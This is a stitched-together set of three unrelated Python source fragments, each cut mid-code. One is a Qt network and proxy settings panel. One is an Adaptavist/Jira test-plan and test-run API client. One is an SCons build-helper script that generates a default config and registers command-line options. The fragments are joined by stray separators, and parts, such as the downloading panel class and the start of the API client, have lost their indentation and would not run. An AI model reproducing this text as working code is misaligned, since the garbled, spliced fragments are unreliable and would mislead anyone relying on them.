            max_network_jobs_per_domain_max = 100
            
        else:
            
            network_timeout_min = 3
            network_timeout_max = 600
            
            error_wait_time_min = 3
            error_wait_time_max = 1800
            
            max_network_jobs_max = 30
            max_network_jobs_per_domain_max = 5
            
        
        self._network_timeout = QP.MakeQSpinBox( general, min = network_timeout_min, max = network_timeout_max )
        self._network_timeout.setToolTip( 'If a network connection cannot be made in this duration or, if once started, it experiences uninterrupted inactivity for six times this duration, it will be abandoned.' )
        
        self._connection_error_wait_time = QP.MakeQSpinBox( general, min = error_wait_time_min, max = error_wait_time_max )
        self._connection_error_wait_time.setToolTip( 'If a network connection times out as above, it will wait increasing multiples of this base time before retrying.' )
        
        self._serverside_bandwidth_wait_time = QP.MakeQSpinBox( general, min = error_wait_time_min, max = error_wait_time_max )
        self._serverside_bandwidth_wait_time.setToolTip( 'If a server returns a failure status code indicating it is short on bandwidth, the network job will wait increasing multiples of this base time before retrying.' )
        
        self._max_network_jobs = QP.MakeQSpinBox( general, min = 1, max = max_network_jobs_max )
        self._max_network_jobs_per_domain = QP.MakeQSpinBox( general, min = 1, max = max_network_jobs_per_domain_max )
        
        #
        
        proxy_panel = ClientGUICommon.StaticBox( self, 'proxy settings' )
        
        self._http_proxy = ClientGUICommon.NoneableTextCtrl( proxy_panel )
        self._https_proxy = ClientGUICommon.NoneableTextCtrl( proxy_panel )
        
        # Populate the controls from the current option values.
        
        self._verify_regular_https.setChecked( self._new_options.GetBoolean( 'verify_regular_https' ) )
        
        self._http_proxy.SetValue( self._new_options.GetNoneableString( 'http_proxy' ) )
        self._https_proxy.SetValue( self._new_options.GetNoneableString( 'https_proxy' ) )
        
        self._network_timeout.setValue( self._new_options.GetInteger( 'network_timeout' ) )
        self._connection_error_wait_time.setValue( self._new_options.GetInteger( 'connection_error_wait_time' ) )
        self._serverside_bandwidth_wait_time.setValue( self._new_options.GetInteger( 'serverside_bandwidth_wait_time' ) )
        self._max_network_jobs.setValue( self._new_options.GetInteger( 'max_network_jobs' ) )
        self._max_network_jobs_per_domain.setValue( self._new_options.GetInteger( 'max_network_jobs_per_domain' ) )
        
        # Lay out the 'general' box.
        
        if self._new_options.GetBoolean( 'advanced_mode' ):
            
            label = 'As you are in advanced mode, these options have very low and high limits. Be very careful about lowering delay time or raising max number of connections too far, as things will break.'
            
            st = ClientGUICommon.BetterStaticText( general, label = label )
            st.setObjectName( 'HydrusWarning' )
            
            st.setWordWrap( True )
            
            general.Add( st, CC.FLAGS_EXPAND_PERPENDICULAR )
            
        
        rows = []
        
        rows.append( ( 'network timeout (seconds): ', self._network_timeout ) )
        rows.append( ( 'connection error retry wait (seconds): ', self._connection_error_wait_time ) )
        rows.append( ( 'serverside bandwidth retry wait (seconds): ', self._serverside_bandwidth_wait_time ) )
        rows.append( ( 'max number of simultaneous active network jobs: ', self._max_network_jobs ) )
        rows.append( ( 'max number of simultaneous active network jobs per domain: ', self._max_network_jobs_per_domain ) )
        rows.append( ( 'BUGFIX: verify regular https traffic:', self._verify_regular_https ) )
        
        gridbox = ClientGUICommon.WrapInGrid( general, rows )
        
        general.Add( gridbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
        
        # Lay out the proxy box, with a help blurb tailored to whether SOCKS
        # support is importable.
        
        text = 'Enter strings such as "http://ip:port" or "http://user:pass@ip:port". It should take affect immediately on dialog ok.'
        text += os.linesep * 2
        
        if ClientNetworkingSessions.SOCKS_PROXY_OK:
            
            text += 'It looks like you have socks support! You should also be able to enter (socks4 or) "socks5://ip:port".'
            text += os.linesep
            text += 'Use socks4a or socks5h to force remote DNS resolution, on the proxy server.'
            
        else:
            
            text += 'It does not look like you have socks support! If you want it, try adding "pysocks" (or "requests[socks]")!'
            
        
        st = ClientGUICommon.BetterStaticText( proxy_panel, text )
        
        st.setWordWrap( True )
        
        proxy_panel.Add( st, CC.FLAGS_EXPAND_PERPENDICULAR )
        
        rows = []
        
        rows.append( ( 'http: ', self._http_proxy ) )
        rows.append( ( 'https: ', self._https_proxy ) )
        
        gridbox = ClientGUICommon.WrapInGrid( proxy_panel, rows )
        
        proxy_panel.Add( gridbox, CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
        
        # Final page layout: general box, proxy box, then a stretchy spacer.
        
        vbox = QP.VBoxLayout()
        
        QP.AddToLayout( vbox, general, CC.FLAGS_EXPAND_PERPENDICULAR )
        QP.AddToLayout( vbox, proxy_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
        QP.AddToLayout( vbox, QW.QWidget( self ), CC.FLAGS_EXPAND_BOTH_WAYS )
        
        self.setLayout( vbox )
        
    
    def UpdateOptions( self ):
        """Write every control's current value back into the options object."""
        
        self._new_options.SetBoolean( 'verify_regular_https', self._verify_regular_https.isChecked() )
        
        self._new_options.SetNoneableString( 'http_proxy', self._http_proxy.GetValue() )
        self._new_options.SetNoneableString( 'https_proxy', self._https_proxy.GetValue() )
        
        self._new_options.SetInteger( 'network_timeout', self._network_timeout.value() )
        self._new_options.SetInteger( 'connection_error_wait_time', self._connection_error_wait_time.value() )
        self._new_options.SetInteger( 'serverside_bandwidth_wait_time', self._serverside_bandwidth_wait_time.value() )
        self._new_options.SetInteger( 'max_network_jobs', self._max_network_jobs.value() )
        self._new_options.SetInteger( 'max_network_jobs_per_domain', self._max_network_jobs_per_domain.value() )
        
    
class _DownloadingPanel( QW.QWidget ):
def __init__( self, parent, new_options ):
QW.QWidget.__init__( self, parent )
self._new_options = new_options
#
gallery_downloader = ClientGUICommon.StaticBox( self, 'gallery downloader' )
gug_key_and_name = HG.client_controller.network_engine.domain_manager.GetDefaultGUGKeyAndName()
self._default_gug = ClientGUIImport.GUGKeyAndNameSelector( gallery_downloader, gug_key_and_name )
self._gallery_page_wait_period_pages = QP.MakeQSpinBox( gallery_downloader, min=1, max=120 )
self._gallery_file_limit = ClientGUICommon.NoneableSpinCtrl( gallery_downloader, none_phrase = 'no limit', min = 1, max = 1000000 )
self._highlight_new_query = QW.QCheckBox( gallery_downloader )
#
subscriptions = ClientGUICommon.StaticBox( self, 'subscriptions' )
self._gallery_page_wait_period_subscriptions = QP.MakeQSpinBox( subscriptions, min=1, max=30 )
self._max_simultaneous_subscriptions = QP.MakeQSpinBox( subscriptions, min=1, max=100 )
self._subscription_file_error_cancel_threshold = ClientGUICommon.NoneableSpinCtrl( subscriptions, min = 1, max = 1000000, unit = 'errors' )
self._subscription_file_error_cancel_threshold.setToolTip( 'This is a simple patch and will be replaced with a better "retry network errors later" system at some point, but is useful to increase if you have subs to unreliable websites.' )
self._process_subs_in_random_order = QW.QCheckBox( subscriptions )
self._process_subs_in_random_order.setToolTip( 'Processing in random order is useful whenever bandwidth is tight, as it stops an \'aardvark\' subscription from always getting first whack at what is available. Otherwise, they will be processed in alphabetical order.' )
checker_options = self._new_options.GetDefaultSubscriptionCheckerOptions()
self._subscription_checker_options = ClientGUIImport.CheckerOptionsButton( subscriptions, checker_options )
#
watchers = ClientGUICommon.StaticBox( self, 'watchers' )
self._watcher_page_wait_period = QP.MakeQSpinBox( watchers, min=1, max=120 )
self._highlight_new_watcher = QW.QCheckBox( watchers )
checker_options = self._new_options.GetDefaultWatcherCheckerOptions()
self._watcher_checker_options = ClientGUIImport.CheckerOptionsButton( watchers, checker_options )
#
misc = ClientGUICommon.StaticBox( self, 'misc' )
self._pause_character = QW.QLineEdit( misc )
self._stop_character = QW.QLineEdit( misc )
self._show_new_on_file_seed_short_summary = QW.QCheckBox( misc )
self._show_deleted_on_file_seed_short_summary = QW.QCheckBox( misc )
if self._new_options.GetBoolean( 'advanced_mode' ):
delay_min = 1
else:
delay_min = 600
self._subscription_network_error_delay = ClientGUITime.TimeDeltaButton( misc, min = delay_min, days = True, hours = True, minutes = True, seconds = True )
| |
status or response.get("status")
}
if folder is not None:
folder = f"/{folder}".replace("//", "/")
self.create_folder(project_key=response["projectKey"], folder_type=TEST_CASE, folder_name=folder)
request_data["folder"] = folder if folder != "/" else None
# append labels and issue links to the current list or create new ones
update_field(response.get("labels", []), request_data, "labels", labels)
update_field(response.get("issueLinks", []), request_data, "issueLinks", issue_links)
# handle custom fields
update_multiline_field(response.get("customFields", {}).get("ci_server_url", ""), request_data, "ci_server_url", build_urls)
update_multiline_field(response.get("customFields", {}).get("code_base_url", ""), request_data, "code_base_url", code_bases)
self._logger.debug("Updating data of test case '%s'", test_case_key)
return bool(self._put(request_url, request_data))
def delete_test_case(self, test_case_key: str) -> bool:
    """
    Delete given test case.

    :param test_case_key: Test case key to be deleted. ex. "<KEY>"
    :returns: True if succeeded, False if not
    """
    request_url = f"{self._adaptavist_api_url}/testcase/{test_case_key}"
    # Fixed log message: removed a stray ')' that was left in the format string.
    self._logger.debug("Deleting test case %s", test_case_key)
    return bool(self._delete(request_url))
def get_test_case_links(self, issue_key: str) -> List[Dict[str, str]]:
    """
    Get the list of test cases linked to an issue.

    :param issue_key: Issue key to look for
    :returns: List of linked test cases
    """
    self._logger.debug("Getting list of issues linked to %s", issue_key)
    response = self._get(f"{self._adaptavist_api_url}/issuelink/{issue_key}/testcases")
    if not response:
        return []
    return response.json()
def link_test_cases(self, issue_key: str, test_case_keys: List[str]) -> bool:
    """
    Link a list of existing testcases to an issue.

    :param issue_key: Issue to link the test cases to
    :param test_case_keys: List of test case keys to be linked to the issue
    :returns: True if succeeded, False if not
    """
    for test_case_key in test_case_keys:
        test_case = self.get_test_case(test_case_key)
        if not test_case:
            self._logger.warning("Test case %s was not found", test_case_key)
            continue
        issue_links = test_case.get("issueLinks", [])
        if issue_key in issue_links:
            # Already linked, nothing to update for this test case.
            continue
        issue_links.append(issue_key)
        self._logger.debug("Adding links to test case %s", test_case_key)
        if not self._put(f"{self._adaptavist_api_url}/testcase/{test_case_key}", {"issueLinks": issue_links}):
            return False
    return True
def unlink_test_cases(self, issue_key: str, test_case_keys: List[str]) -> bool:
    """
    Unlink a list of existing testcases from an issue.

    :param issue_key: Issue to unlink the test cases from
    :param test_case_keys: List of test case keys to be unlinked from the issue
    :returns: True if succeeded, False if not
    """
    for test_case_key in test_case_keys:
        test_case = self.get_test_case(test_case_key)
        if not test_case:
            self._logger.warning("Test case %s was not found", test_case_key)
            continue
        issue_links = test_case.get("issueLinks", [])
        if issue_key not in issue_links:
            # Not linked to this issue, nothing to remove.
            continue
        issue_links.remove(issue_key)
        self._logger.debug("Removing links from test case %s", test_case_key)
        if not self._put(f"{self._adaptavist_api_url}/testcase/{test_case_key}", {"issueLinks": issue_links}):
            return False
    return True
def get_test_plan(self, test_plan_key: str) -> Dict[str, Any]:
    """
    Get info about a test plan.

    :param test_plan_key: Test plan key to look for
    :returns: Info about test plan
    """
    self._logger.debug("Getting test plan %s", test_plan_key)
    response = self._get(f"{self._adaptavist_api_url}/testplan/{test_plan_key}")
    return response.json() if response else {}
def get_test_plans(self, search_mask: str = "folder <= \"/\"") -> List[Dict[str, Any]]:
    """
    Get a list of test plans matching the search mask.

    Unfortunately, /testplan/search does not support empty query, so we use a basic filter here to get all test plans, if no search mask is given.

    :param search_mask: Search mask to match test plans
    :returns: List of test plans
    """
    test_plans: List[Dict[str, Any]] = []
    start_at = 0
    while True:
        request_url = (
            f"{self._adaptavist_api_url}/testplan/search"
            f"?query={quote_plus(search_mask)}&startAt={start_at}"
        )
        self._logger.debug("Asking for test plans with search mask '%s' starting at %i", search_mask, start_at + 1)
        response = self._get(request_url)
        batch = response.json() if response else []
        if not batch:
            return test_plans
        test_plans.extend(batch)
        start_at += len(batch)
def create_test_plan(self, project_key: str, test_plan_name: str, **kwargs: Any) -> Optional[str]:
    """
    Create a new test plan.

    :param project_key: Project key of the test plan ex. "TEST"
    :param test_plan_name: Name of the test plan to be created
    :key folder: Name of the folder where to create the new test plan
    :key objective: Objective of the new test plan
    :key status: Status of the test case (e.g. "Draft" or "Approved")
    :key labels: List of labels to be added
    :key issue_links: List of issue keys to link the new test plan to
    :key test_runs: List of test run keys to be linked to the test plan ex. ["TEST-R2","TEST-R7"]
    :return: Key of the test plan created
    """
    # Folders always need to start with a slash.
    folder: str = f"/{kwargs.pop('folder', '')}".replace("//", "/")
    objective: str = kwargs.pop("objective", "")
    status: str = kwargs.pop("status", STATUS_APPROVED)
    labels: List[str] = kwargs.pop("labels", [])
    issue_links: List[str] = kwargs.pop("issue_links", [])
    test_runs: List[str] = kwargs.pop("test_runs", [])
    raise_on_kwargs_not_empty(kwargs)

    self.create_folder(project_key=project_key, folder_type=TEST_PLAN, folder_name=folder)

    payload = {
        "projectKey": project_key,
        "name": test_plan_name,
        "folder": None if folder == "/" else folder,  # the API uses null for the root folder
        "status": status,
        "objective": objective,
        "labels": labels,
        "issueLinks": issue_links,
        "testRunKeys": test_runs,
    }
    self._logger.debug("Creating test plan %s in project %s", test_plan_name, project_key)
    response = self._post(f"{self._adaptavist_api_url}/testplan", payload)
    return response.json()["key"] if response else None
def edit_test_plan(self, test_plan_key: str, **kwargs: Any) -> bool:
    """
    Edit given test plan.

    :param test_plan_key: Test plan key to be edited. ex. "<KEY>"
    :key folder: Folder to move the test plan into
    :key name: Name of the test plan
    :key objective: Objective of the test plan
    :key status: Status of the test plan (e.g. "Draft" or "Approved")
    :key labels: List of labels to be added (add a "-" as first list entry to create a new list)
    :key issue_links: List of issue keys to link the test plan to (add a "-" as first list entry to create a new list)
    :key test_runs: List of test run keys to be linked/added to the test plan ex. ["TEST-R2","TEST-R7"] (add a "-" as first list entry to create a new list)
    :returns: True if succeeded, False if not
    """
    folder: Optional[str] = kwargs.pop("folder", None)
    name: str = kwargs.pop("name", "")
    objective: str = kwargs.pop("objective", "")
    status: str = kwargs.pop("status", "")
    labels: List[str] = kwargs.pop("labels", [])
    issue_links: List[str] = kwargs.pop("issue_links", [])
    test_runs: List[str] = kwargs.pop("test_runs", [])
    raise_on_kwargs_not_empty(kwargs)

    response = self.get_test_plan(test_plan_key)
    if not response:
        return False

    request_url = f"{self._adaptavist_api_url}/testplan/{test_plan_key}"
    request_data = {
        "name": name or response.get("name"),
        "objective": objective or response.get("objective"),
        "status": status or response.get("status"),
    }
    if folder is not None:
        folder = f"/{folder}".replace("//", "/")
        # BUGFIX: this method edits a test *plan*, so the destination folder must be
        # created in the test-plan folder tree (was wrongly TEST_CASE, matching
        # edit_test_case instead of create_test_plan).
        self.create_folder(project_key=response["projectKey"], folder_type=TEST_PLAN, folder_name=folder)
        request_data["folder"] = folder if folder != "/" else None
    # append labels, test runs and issue links to the current list or create new ones
    update_field(response.get("labels", []), request_data, "labels", labels)
    update_field([test_run["key"] for test_run in response.get("testRuns", [])], request_data, "testRuns", test_runs)
    update_field(response.get("issueLinks", []), request_data, "issueLinks", issue_links)
    self._logger.debug("Updating test plan %s", test_plan_key)
    return bool(self._put(request_url, request_data))
def get_test_run(self, test_run_key: str) -> Dict[str, Any]:
    """
    Get info about a test run.

    :param test_run_key: Test run key to look for
    :returns: Info about the test run
    """
    self._logger.debug("Getting test run %s", test_run_key)
    response = self._get(f"{self._adaptavist_api_url}/testrun/{test_run_key}")
    return response.json() if response else {}
def get_test_run_by_name(self, test_run_name: str) -> Dict[str, Any]:
    """
    Get info about a test run (last one found by name).

    .. note:: This method is using JIRA API as Adaptavist API does not support this properly (would be too slow to get this info).

    :param test_run_name: Test run name to look for
    :returns: Info about the test run
    """
    matches: List[Dict[str, Any]] = []
    start_at = 0
    query = quote_plus(f"testRun.name = \"{test_run_name}\"")
    while True:
        request_url = (
            f"{self.jira_server}/rest/tests/1.0/testrun/search"
            f"?startAt={start_at}&maxResults=10000&query={query}&fields=id,key,name"
        )
        self._logger.debug("Asking for 10000 test runs starting at %i", start_at + 1)
        response = self._get(request_url)
        batch = response.json()["results"] if response else []
        if not batch:
            break
        matches.extend(batch)
        start_at += len(batch)
    if not matches:
        return {}
    last = matches[-1]
    return {"key": last["key"], "name": last["name"]}
def get_test_runs(self, search_mask: str = "folder = \"/\"", **kwargs: Any) -> List[Dict[str, Any]]:
"""
Get a list of test runs matching the search mask.
Unfortunately, /testrun/search does not support empty query, so we use a basic filter here to get all test runs, if no search mask is given.
:param search_mask: Search mask to match test runs
:key fields: Comma-separated list of fields to be included (e.g. key, name, items)
.. note:: If fields is not set, all fields will be returned. This can be slow as it will also also include test result items.
:returns: List of | |
# -*- python -*-
#/******************************************************************************
# * Copyright (c) 2004, 2009 <NAME>.
# * All rights reserved. This program and the accompanying materials
# * are made available under the terms of the Eclipse Public License v1.0
# * which accompanies this distribution, and is available at
# * http://www.eclipse.org/legal/epl-v10.html
# *****************************************************************************/
# Fallback values used to seed a freshly generated SconsBuilderConfig.py
# (see the try/except bootstrap below) and as defaults for the build scripts.
DEFAULT_BIN_DIR = 'bin'    # output directory for built binaries
DEFAULT_LIB_DIR = 'lib'    # output directory for built libraries
DEFAULT_DOC_DIR = 'doc'    # output directory for generated documentation
DEFAULT_SKIP_DIRS = ['.*', 'CVS', 'bin', 'lib', 'doc']    # glob patterns of directories excluded from source scans
DEFAULT_CXX_GLOB = ['*.c', '*.cc', '*.cpp', '*.cxx']    # glob patterns recognised as C/C++ sources
DEFAULT_BASE_VARIANT_DIR = '.build'    # root of the SCons variant (out-of-source) build tree
DEFAULT_DOXYGEN_CONFIGFILE = 'doxygen.cfg'    # doxygen config used by --documentation
# Unit-test related defaults; empty strings mean "not configured".
DEFAULT_UNITTEST_DIR_NAME = 'test'
DEFAULT_UNITTEST_TEST_PREFIX = 'test-'
DEFAULT_UNITTEST_LIB_PREFIX = 'test-'
DEFAULT_UNITTEST_LIB_DIR = ''
DEFAULT_UNITTEST_LIB = ''
DEFAULT_UNITTEST_INCLUDE_DIR = ''
DEFAULT_UNITTEST_TESTRUNNER = ''
DEFAULT_SCONSBUILDER_CONFIG_FILE_NAME = '.scb'    # per-directory SconsBuilder config file name
import fnmatch
import glob
import os
import re
import string
import SCons.Script
# SconsBuilder may work with earlier version,
# but it was build and tested against SCons 1.0.0
#SCons.Script.EnsureSConsVersion(1,0,0)
# SconsBuilder may work with earlier version,
# but it was build and tested against Python 2.4
SCons.Script.EnsurePythonVersion(2,4)
# Import the user/IDE-maintained build configuration.  On first run the module
# does not exist yet, so generate a default SconsBuilderConfig.py from the
# DEFAULT_* constants above and import it afterwards.
try:
    import SconsBuilderConfig
except:
    print 'Generating default SconsBuilderConfig.py'
    configfile = open('SconsBuilderConfig.py', 'w')
    configfile.write('# -*- python -*-\n')
    configfile.write('# This file was automatically generated\n')
    configfile.write('# Do NOT edit this file when using the Eclipse SconsBuilder plugin!\n')
    configfile.write('# The Eclipse SconsBuilder plugin WILL overwrite this file!\n')
    configfile.write('\n')
    configfile.write('BASE_VARIANT_DIR = ' + repr(DEFAULT_BASE_VARIANT_DIR) + '\n')
    configfile.write('\n')
    configfile.write('BUILD_CONFIGURATIONS = []\n')
    configfile.write('BUILD_CONFIGURATION = None\n')
    configfile.write('\n')
    configfile.write('BUILD_TARGETS = []\n')
    configfile.write('BUILD_TARGET = None\n')
    configfile.write('\n')
    configfile.write('BIN_DIR = ' + repr(DEFAULT_BIN_DIR) + '\n')
    configfile.write('LIB_DIR = ' + repr(DEFAULT_LIB_DIR) + '\n')
    configfile.write('DOC_DIR = ' + repr(DEFAULT_DOC_DIR) + '\n')
    configfile.write('\n')
    configfile.write('DOXYGEN_CONFIGFILE = ' + repr(DEFAULT_DOXYGEN_CONFIGFILE) + '\n')
    configfile.write('\n')
    configfile.write('UNITTEST_ENABLED = False\n')
    configfile.write('UNITTEST_DIR_NAME = ' + repr(DEFAULT_UNITTEST_DIR_NAME) + ' \n')
    configfile.write('UNITTEST_TEST_PREFIX = ' + repr(DEFAULT_UNITTEST_TEST_PREFIX) + ' \n')
    configfile.write('UNITTEST_LIB_PREFIX = ' + repr(DEFAULT_UNITTEST_LIB_PREFIX) + ' \n')
    configfile.write('UNITTEST_INCLUDE_DIR = ' + repr(DEFAULT_UNITTEST_INCLUDE_DIR) + '\n')
    configfile.write('UNITTEST_LIB_DIR = ' + repr(DEFAULT_UNITTEST_LIB_DIR) + '\n')
    configfile.write('UNITTEST_LIB = ' + repr(DEFAULT_UNITTEST_LIB) + '\n')
    configfile.write('UNITTEST_TESTRUNNER = ' + repr(DEFAULT_UNITTEST_TESTRUNNER) + '\n')
    configfile.write('\n')
    configfile.write('SKIP_DIRS = ' + repr(DEFAULT_SKIP_DIRS) + '\n')
    configfile.write('\n')
    configfile.write('CXX_GLOB = ' + repr(DEFAULT_CXX_GLOB) + '\n')
    configfile.write('\n')
    configfile.write('SCONSBUILDER_CONFIG_FILE_NAME = ' + repr(DEFAULT_SCONSBUILDER_CONFIG_FILE_NAME) + '\n')
    configfile.write('\n')
    configfile.close()
    # The default file now exists, so this import must succeed.
    import SconsBuilderConfig
# Directory SCons was launched from, and the directory containing this script.
SCB_LAUNCH_DIR = SCons.Script.GetLaunchDir()
SCB_SCRIPT_DIR = os.getcwd()
# Registry of SCons environments, keyed by absolute project-directory path
# (looked up via getEnvironment()).
allEnvironments = {}
def addCommandLineOptions():
    """Register every SconsBuilder command-line option with SCons.

    Defaults for the build configuration/target and the doxygen config file
    come from SconsBuilderConfig, so a generated config can pre-select them.
    """
    option_specs = [
        ('--buildconfiguration',
         dict(dest='buildconfiguration', nargs=1, type='string', action='store',
              metavar='CONFIGURATION',
              default=SconsBuilderConfig.BUILD_CONFIGURATION,
              help='select a build configuration (e.g. debug, release, ...)')),
        ('--buildtarget',
         dict(dest='buildtarget', nargs=1, type='string', action='store',
              metavar='TARGET',
              default=SconsBuilderConfig.BUILD_TARGET,
              help='select a build target (e.g. linux, winXP, ...)')),
        ('--verbosity',
         dict(dest='verbosity', nargs=1, type='int', action='store',
              metavar='INTEGER', default=1,
              help='select the verbosity level (0..n)')),
        ('--showcommands',
         dict(dest='showcommands', action='store_true', default=False,
              help='show commands executed')),
        ('--dist',
         dict(dest='dist', action='store_true', default=False,
              help='make the GINI distribution file (tar gzipped)')),
        ('--install',
         dict(dest='install', action='store_true', default=False,
              help='install the binary files in the proper location... ')),
        ('--documentation',
         dict(dest='documentation', action='store_true', default=False,
              help='build doxygen documentation')),
        ('--doxygenfile',
         dict(dest='doxygenfile', nargs=1, type='string', action='store',
              metavar='DOXYFILE',
              default=SconsBuilderConfig.DOXYGEN_CONFIGFILE,
              help='specify the doxygen config file')),
        ('--forcemodified',
         dict(dest='forcemodified', nargs=1, type='string', action='append',
              metavar='SOURCEFILE', default=[],
              help='pretend that SOURCEFILE was modified')),
        ('--nice',
         dict(dest='nice', nargs=1, type='int', action='store',
              metavar='INTEGER', default=10,
              help='select the nice level (process priority adjustment) (0..n)')),
    ]
    # Register in declaration order; same calls as before, data-driven.
    for flag, options in option_specs:
        SCons.Script.AddOption(flag, **options)
def printBuild(env):
    """Print a one-line banner describing what is about to be built.

    Shows the script directory relative to the project root and, in
    parentheses, the build target and configuration stored in *env*.
    """
    target = tryGetEnvironment(env, 'SCB_BUILD_TARGET')
    config = tryGetEnvironment(env, 'SCB_BUILD_CONFIGURATION')
    # Only separate target and configuration with a space when both are set.
    if config and target:
        space = ' '
    else:
        space = ''
    print # new line
    print (
        'Building %s (%s%s%s)' %
        (
            relativePath(SCB_SCRIPT_DIR),
            tryGetEnvironment(env, 'SCB_BUILD_TARGET', default=''),
            space,
            tryGetEnvironment(env, 'SCB_BUILD_CONFIGURATION', default='')
        )
    )
def printCmdLine(s, target, src, env):
    """SCons command-line print hook.

    Unless --showcommands was given, replace the raw command line *s* with a
    short "Builder('target')" summary, one line per target node.
    """
    if not SCons.Script.GetOption('showcommands'):
        summaries = [
            "%s('%s')" % (entry.builder.get_name(env), str(entry))
            for entry in target
        ]
        s = '\n'.join(summaries)
    log(1, [s])
def log(level, messages):
    """Print each message in *messages* when the verbosity is at least *level*."""
    if verbosity() < level:
        return
    for message in messages:
        print(message)
def tryGetEnvironment(env, key, default=None, emptyOk=True):
    """Return env[key], or *default* if the lookup fails for any reason.

    :param env: mapping-like object (may be None or lack the key)
    :param key: key to look up
    :param default: value returned when the lookup fails
    :param emptyOk: kept for backward compatibility; the historical
        empty-value check was a complete no-op and has been removed.
    """
    value = default
    try:
        value = env[key]
    except:
        # env may be None, not a mapping, or simply lack the key.
        pass
    log(12, ['tryGetEnvironment: env[%s]=%s' % (key, value)])
    return value
def relativePath(path, base=SCB_SCRIPT_DIR, prefix=True):
    """Return *path* with the prefix it shares with *base* removed.

    :param path: absolute path to shorten
    :param base: reference path (default: the script directory)
    :param prefix: when True, compare against base's parent directory so the
        base directory's own name is kept in the result
    :return: the shortened path without a leading slash
    """
    if prefix:
        base = os.path.dirname(base)
    # str.replace() is the py2/py3-safe equivalent of the removed
    # string.replace() module function (same replace-all semantics).
    newpath = path.replace(os.path.commonprefix([base, path]), '')
    if newpath.startswith('/'):
        return newpath[1:]
    return newpath
def listDirectories(path, skip=None):
    """Return the sorted names of the immediate subdirectories of *path*.

    :param path: directory to scan ('' is treated as the current directory)
    :param skip: optional list of fnmatch patterns; entries whose basename
        matches any pattern are omitted
    """
    if skip is None:  # avoid the shared mutable-default pitfall
        skip = []
    if path == '':
        path = '.'
    dirlist = sorted(
        item for item in os.listdir(path)
        if os.path.isdir(os.path.join(path, item))
    )
    log(20, ['dirlist=%s' % (dirlist)])
    # filter instead of the original append-then-remove loop (same result,
    # no bare except needed)
    return [npath for npath in dirlist
            if not any(fnmatch.fnmatch(os.path.basename(npath), check)
                       for check in skip)]
def mkdir(newdir):
    """works the way a good mkdir should :)
        - already exists, silently complete
        - regular file in the way, raise an exception
        - parent directory(ies) does not exist, make them as well
    """
    if os.path.isdir(newdir):
        return  # nothing to do
    if os.path.isfile(newdir):
        raise OSError("a file with the same name as the desired " \
                      "dir, '%s', already exists." % newdir)
    # create missing parents first, then the leaf; an empty tail means the
    # path ended in a separator and the recursive call already made it
    head, tail = os.path.split(newdir)
    if head and not os.path.isdir(head):
        mkdir(head)
    if tail:
        os.mkdir(newdir)
def verbosity():
    """Return the current --verbosity option value, or 1 when the option is
    unavailable (e.g. not registered yet or outside an SCons run)."""
    try:
        return SCons.Script.GetOption('verbosity')
    except Exception:  # option lookup can fail before AddOption has run
        return 1
def getEnvironment(path):
    """Return the Environment registered for *path* in allEnvironments,
    or None when no environment was registered for it."""
    try:
        return allEnvironments[os.path.abspath(path)]
    except KeyError:  # narrowed from a bare except: only "not registered"
        return None
def rootEnvironment():
    """Return the Environment registered for the top-level script directory."""
    return getEnvironment(SCB_SCRIPT_DIR)
def printEnv(verbosity, env):
    """Dump SCB_* settings of *env* to stdout, with detail scaled by verbosity.

    verbosity >= 15 dumps the entire construction environment, >= 14 prints
    the full SCB_* key set, >= 13 prints a reduced key set; lower levels
    print nothing.  Output format is identical to the original hand-written
    print statements: env['KEY']=value, one per line, after a blank line.
    """
    # Keys printed at verbosity >= 14 (order — and the duplicated
    # SCB_UNITTEST_MODIFY entry — kept from the original list).
    full_keys = [
        'SCB_LAUNCH_DIR', 'SCB_SCRIPT_DIR', 'SCB_BASE_VARIANT_DIR',
        'SCB_VARIANT_DIR', 'SCB_BIN_DIR', 'SCB_LIB_DIR', 'SCB_DOC_DIR',
        'SCB_ABSOLUTE_PATH', 'SCB_RELATIVE_PATH', 'SCB_UNITTEST_MODIFY',
        'SCB_UNITTESTRUNNER_MODIFY', 'SCB_FILE_MODIFY',
        'SCB_BUILD_CONFIGURATION', 'SCB_BUILD_TARGET',
        'SCB_PREPARE_OBJECT_TARGETS', 'SCB_PREPARE_LIBRARY_TARGETS',
        'SCB_PREPARE_EXECUTABLE_TARGETS', 'SCB_SCONS_TARGETS',
        'SCB_SKIP_DIRS', 'SCB_CXX_GLOB', 'SCB_CXX_SKIP',
        'SCB_UNITTEST_ENABLED', 'SCB_UNITTEST_DIR_NAME',
        'SCB_UNITTEST_TEST_PREFIX', 'SCB_UNITTEST_LIB_PREFIX',
        'SCB_UNITTEST_LIB_DIR', 'SCB_UNITTEST_LIB',
        'SCB_UNITTEST_INCLUDE_DIR', 'SCB_UNITTEST_TESTRUNNER',
        'SCB_UNITTEST_MODIFY', 'SCB_PLATFORM', 'SCB_SHARED_LIB_NAME',
        'SCB_STATIC_LIB_NAME', 'SCB_EXECUTABLE_NAME',
    ]
    # Reduced key set printed at verbosity >= 13.
    brief_keys = [
        'SCB_BASE_VARIANT_DIR', 'SCB_VARIANT_DIR', 'SCB_BIN_DIR',
        'SCB_LIB_DIR', 'SCB_DOC_DIR', 'SCB_ABSOLUTE_PATH',
        'SCB_RELATIVE_PATH', 'SCB_UNITTEST_MODIFY', 'SCB_FILE_MODIFY',
        'SCB_SHARED_LIB_NAME', 'SCB_STATIC_LIB_NAME', 'SCB_EXECUTABLE_NAME',
    ]
    if verbosity >= 15:
        print('')
        print(env.Dump())
    elif verbosity >= 14:
        print('')
        for key in full_keys:
            print('env[\'%s\']=%s' % (key, tryGetEnvironment(env, key)))
    elif verbosity >= 13:
        print('')
        for key in brief_keys:
            print('env[\'%s\']=%s' % (key, tryGetEnvironment(env, key)))
# allow to (re)build files by specifying the source(s)
def forcedDecider(dependency, target, prev_ni):
    """SCons Decider: report a dependency as changed when it was listed via
    --forcemodified, or when its content signature differs from the stored one."""
    log(12, ['Checking dependency %s' % dependency])
    if str(dependency) in SCons.Script.GetOption('forcemodified'):
        log(1, ['Dependency %s is forced modified' % dependency])
        return True
    if prev_ni and dependency.get_csig() != prev_ni.csig:
        log(11, ['Dependency %s is modified' % dependency])
        return True
    return False
def prepareCallback(env, targets, useCallback=True):
    """Record freshly created *targets* in env['SCB_SCONS_TARGETS'], keyed by
    builder name, then optionally invoke the registered prepare callback.

    :param env: SCons environment holding the SCB_SCONS_TARGETS registry
    :param targets: SCons target nodes to register
    :param useCallback: when True, hand the targets to env['SCB_PREPARE_CALLBACK']
